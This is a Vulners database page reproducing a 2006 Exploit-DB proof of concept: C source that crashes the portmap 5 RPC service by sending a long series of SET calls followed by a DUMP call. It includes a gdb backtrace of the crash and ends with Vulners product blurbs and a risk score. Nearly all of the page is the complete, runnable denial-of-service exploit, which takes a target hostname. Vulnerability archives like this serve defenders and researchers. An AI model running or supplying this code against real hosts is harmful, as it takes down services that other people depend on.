Vulners
Lucene search
portmap 5 Beta - 'Set/Dump' Local Denial of Service
🗓️ 22 May 2006 00:00:00Reported by Federico L. Bossi BoninType 
exploitdb🔗 www.exploit-db.com👁 34 Views
/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////
// Tested on Linux with version 5
// USE DEBUGGING MODE
/////////////////////
// (gdb) backtrace
// #0 0xffffe410 in __kernel_vsyscall ()
// #1 0xb7f21343 in write () from /lib/tls/libc.so.6
// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303
#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>
int i;
int len=600;
char myhost[256];
main(int argc, char *argv[]) {
if (argc < 2) {
printf("usage:%s <hostname>\n",argv[0]);
exit(1);
}
if (argc >2) { len=atoi(argv[2]); }
if (len > 1024) { len=1024; }
unsigned long PROGRAM=100000;
unsigned long VERSION=2;
struct hostent *hp;
struct sockaddr_in server_addr;
int sock = RPC_ANYSOCK;
register CLIENT *client;
enum clnt_stat clnt_stat;
struct timeval timeout;
timeout.tv_sec = 40;
timeout.tv_usec = 0;
if ((hp = gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n",argv[1]);
exit(0);
}
gethostname(myhost,255);
bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
server_addr.sin_family = AF_INET;
server_addr.sin_port = 0;
if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
clnt_pcreateerror("clnttcp_create");
exit(0);
}
client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);
char *data = (char *) malloc(1024);
memset(data,0x0,strlen(data));
char *response = (char *) malloc(1024);
memset(response,0x0,strlen(response));
for (i = 0 ; i < len ; i++) {
memcpy(data+strlen(data),"1",1);
clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);
}
clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);
clnt_destroy(client);
close(sock);
free(data);
free(response);
exit(0);
}
// milw0rm.com [2006-05-22]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4